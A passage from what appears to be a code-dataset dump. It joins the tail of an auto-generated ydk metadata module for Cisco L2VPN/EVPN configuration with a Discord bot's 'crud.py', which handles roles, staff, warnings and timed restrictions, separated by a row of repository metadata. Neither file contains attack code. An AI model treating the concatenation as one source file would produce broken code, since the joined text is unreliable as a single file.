_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteDistinguisher']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai.InterfaceDaiAddressValidation']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType.StormControlUnit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon.SplitHorizonGroupId']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses.StaticMacAddress']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacAging']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacSecure']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacLimit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceIpSourceGuard']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceProfile']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns.BdPseudowireEvpn']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai.DaiAddressValidation']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces.RoutedInterface']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.NvSatellite']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.IpSourceGuard']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.Sequencing']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.TypeOfService']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.SignalingProtocol']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.PathMtu']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup.FlowLabelLoadBalance']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.Sequencing']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.MplsRedundancy']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.PreferredPath']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.BackupDisableDelay']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses']['meta_info']
_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits.VlanUnawareFxcAttachmentCircuit']['meta_info'].parent =_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits']['meta_info']
_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns.VlanUnawareFxcPseudowireEvpn']['meta_info'].parent =_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns']['meta_info']
_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits']['meta_info'].parent =_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService']['meta_info']
_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns']['meta_info'].parent =_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService']['meta_info']
_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService']['meta_info'].parent =_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices']['meta_info']
_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices']['meta_info'].parent =_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable']['meta_info']
_meta_table['L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces.IccpInterface']['meta_info'].parent =_meta_table['L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces']['meta_info']
_meta_table['L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces']['meta_info'].parent =_meta_table['L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup']['meta_info']
_meta_table['L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup']['meta_info'].parent =_meta_table['L2Vpn.Database.Redundancy.IccpRedundancyGroups']['meta_info']
_meta_table['L2Vpn.Database.Redundancy.IccpRedundancyGroups']['meta_info'].parent =_meta_table['L2Vpn.Database.Redundancy']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings']['meta_info'].parent =_meta_table['L2Vpn.Database']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups']['meta_info'].parent =_meta_table['L2Vpn.Database']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups']['meta_info'].parent =_meta_table['L2Vpn.Database']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses']['meta_info'].parent =_meta_table['L2Vpn.Database']['meta_info']
_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable']['meta_info'].parent =_meta_table['L2Vpn.Database']['meta_info']
_meta_table['L2Vpn.Database.Redundancy']['meta_info'].parent =_meta_table['L2Vpn.Database']['meta_info']
_meta_table['L2Vpn.AutoDiscovery.BgpSignaling']['meta_info'].parent =_meta_table['L2Vpn.AutoDiscovery']['meta_info']
_meta_table['L2Vpn.Utility.Logging']['meta_info'].parent =_meta_table['L2Vpn.Utility']['meta_info']
_meta_table['L2Vpn.Snmp.Mib.MibInterface.Format']['meta_info'].parent =_meta_table['L2Vpn.Snmp.Mib.MibInterface']['meta_info']
_meta_table['L2Vpn.Snmp.Mib.MibInterface']['meta_info'].parent =_meta_table['L2Vpn.Snmp.Mib']['meta_info']
_meta_table['L2Vpn.Snmp.Mib.MibPseudowire']['meta_info'].parent =_meta_table['L2Vpn.Snmp.Mib']['meta_info']
_meta_table['L2Vpn.Snmp.Mib']['meta_info'].parent =_meta_table['L2Vpn.Snmp']['meta_info']
_meta_table['L2Vpn.PwRouting']['meta_info'].parent =_meta_table['L2Vpn']['meta_info']
_meta_table['L2Vpn.Neighbor']['meta_info'].parent =_meta_table['L2Vpn']['meta_info']
_meta_table['L2Vpn.Database']['meta_info'].parent =_meta_table['L2Vpn']['meta_info']
_meta_table['L2Vpn.Pbb']['meta_info'].parent =_meta_table['L2Vpn']['meta_info']
_meta_table['L2Vpn.AutoDiscovery']['meta_info'].parent =_meta_table['L2Vpn']['meta_info']
_meta_table['L2Vpn.Utility']['meta_info'].parent =_meta_table['L2Vpn']['meta_info']
_meta_table['L2Vpn.Snmp']['meta_info'].parent =_meta_table['L2Vpn']['meta_info']
_meta_table['GenericInterfaceLists.GenericInterface.Interfaces.Interface']['meta_info'].parent =_meta_table['GenericInterfaceLists.GenericInterface.Interfaces']['meta_info']
_meta_table['GenericInterfaceLists.GenericInterface.Interfaces']['meta_info'].parent =_meta_table['GenericInterfaceLists.GenericInterface']['meta_info']
_meta_table['GenericInterfaceLists.GenericInterface']['meta_info'].parent =_meta_table['GenericInterfaceLists']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.TwoByteAsOrFourByteAs']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.Ipv4Address']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteDistinguisher']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EviLoadBalancing']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnbgpAutoDiscovery.EvpnRouteDistinguisher']['meta_info'].parent =_meta_table['Evpn.EvpnTables.EvpnbgpAutoDiscovery']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving.ServiceList']['meta_info'].parent =_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.IdentifierType0']['meta_info'].parent =_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving']['meta_info'].parent =_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EvpnacTimers']['meta_info'].parent =_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment']['meta_info'].parent =_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface']['meta_info'].parent =_meta_table['Evpn.EvpnTables.EvpnInterfaces']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnTimers']['meta_info'].parent =_meta_table['Evpn.EvpnTables']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis']['meta_info'].parent =_meta_table['Evpn.EvpnTables']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnLoadBalancing']['meta_info'].parent =_meta_table['Evpn.EvpnTables']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnbgpAutoDiscovery']['meta_info'].parent =_meta_table['Evpn.EvpnTables']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnInterfaces']['meta_info'].parent =_meta_table['Evpn.EvpnTables']['meta_info']
_meta_table['Evpn.EvpnTables']['meta_info'].parent =_meta_table['Evpn']['meta_info']
| true
| true
|
f705108a187baf052d5db4933fed18471b99b3db
| 11,826
|
py
|
Python
|
utils/crud.py
|
DaQueenJodi/Kurisu
|
2a4e9010c862c2dcffb406d3596ed9a115533154
|
[
"Apache-2.0"
] | null | null | null |
utils/crud.py
|
DaQueenJodi/Kurisu
|
2a4e9010c862c2dcffb406d3596ed9a115533154
|
[
"Apache-2.0"
] | null | null | null |
utils/crud.py
|
DaQueenJodi/Kurisu
|
2a4e9010c862c2dcffb406d3596ed9a115533154
|
[
"Apache-2.0"
] | null | null | null |
from . import models
import datetime
from discord import utils, TextChannel
def generate_id():
return utils.time_snowflake(datetime.datetime.now())
async def add_permanent_role(user_id: int, role_id: int):
await add_dbmember_if_not_exist(user_id)
if not await models.PermanentRole.query.where((models.PermanentRole.user_id == user_id) & (
models.PermanentRole.role_id == role_id)).gino.first():
return await models.PermanentRole.create(user_id=user_id, role_id=role_id)
async def remove_permanent_role(user_id: int, role_id: int):
permanent_role = await models.PermanentRole.query.where((models.PermanentRole.user_id == user_id) & (
models.PermanentRole.role_id == role_id)).gino.first()
if permanent_role:
await permanent_role.delete()
return permanent_role
async def get_permanent_roles(user_id: int):
db_member = await get_dbmember(user_id)
if db_member:
return await models.Role.query.where((models.Role.id == models.PermanentRole.role_id) & (models.PermanentRole.user_id == db_member.id)).gino.all()
async def add_staff(user_id: int, position: str):
await add_dbmember_if_not_exist(user_id)
staff = await get_staff(user_id) or await get_helper(user_id)
if staff:
await staff.update(position=position).apply()
else:
await models.Staff.create(id=user_id, position=position)
async def add_helper(user_id: int, position: str, console: str = None):
await add_dbmember_if_not_exist(user_id)
if staff := await get_staff(user_id):
await staff.update(console=console).apply()
else:
await models.Staff.create(id=user_id, position=position, console=console)
async def remove_staff(user_id: int):
staff = await get_staff(user_id)
if staff:
if staff.console:
await staff.update(position="Helper").apply()
else:
await staff.delete()
async def remove_helper(user_id: int):
helper = await get_helper(user_id)
if helper:
if helper.position != "Helper":
await helper.update(console=None).apply()
else:
await helper.delete()
async def get_staff_all():
return await models.Staff.query.where(models.Staff.position != 'Helper').gino.all()
async def get_staff(user_id: int):
return await models.Staff.query.where(
(models.Staff.position != 'Helper') & (models.Staff.id == user_id)).gino.first()
async def get_helpers():
return await models.Staff.query.where(models.Staff.console.isnot(None)).gino.all()
async def get_helper(user_id: int):
return await models.Staff.query.where(models.Staff.id == user_id).gino.first()
async def add_warn(user_id: int, issuer_id: int, reason: str):
await add_dbmember_if_not_exist(user_id)
await add_dbmember_if_not_exist(issuer_id)
await models.Warn.create(id=generate_id(), user=user_id, issuer=issuer_id, reason=reason)
async def copy_warn(user_id: int, warn: models.Warn):
await add_dbmember_if_not_exist(user_id)
warn.id = utils.time_snowflake(utils.snowflake_time(warn.id) + datetime.timedelta(milliseconds=1))
while await get_warn(warn.id):
warn.id = utils.time_snowflake(utils.snowflake_time(warn.id) + datetime.timedelta(milliseconds=1))
warn.user = user_id
await warn.create()
async def get_warn(warn_id: int):
return await models.Warn.get(warn_id)
async def get_warns(user_id: int):
return await models.Warn.query.where(models.Warn.user == user_id).gino.all()
async def remove_warn_id(user_id: int, index: int):
warn = await models.Warn.query.where(models.Warn.user == user_id).offset(index - 1).gino.first()
await warn.delete()
async def remove_warns(user_id: int):
n_warns = await (models.db.select([models.db.func.count()]).where(models.Warn.user == user_id).gino.scalar())
if n_warns:
await models.Warn.delete.where(models.Warn.user == user_id).gino.status()
return n_warns
async def add_timed_restriction(user_id: int, end_date: datetime.datetime, type: str):
await add_dbmember_if_not_exist(user_id)
await models.TimedRestriction.create(id=generate_id(), user=user_id, type=type,
end_date=end_date)
async def get_time_restrictions_by_user(user_id: int):
return await models.TimedRestriction.query.where(models.TimedRestriction.user == user_id).gino.all()
async def get_time_restrictions_by_user_type(user_id: int, type: str):
return await models.TimedRestriction.query.where((models.TimedRestriction.user == user_id) & (
models.TimedRestriction.type == type)).gino.first()
async def get_time_restrictions_by_type(type: str):
return await models.TimedRestriction.query.where(models.TimedRestriction.type == type).gino.all()
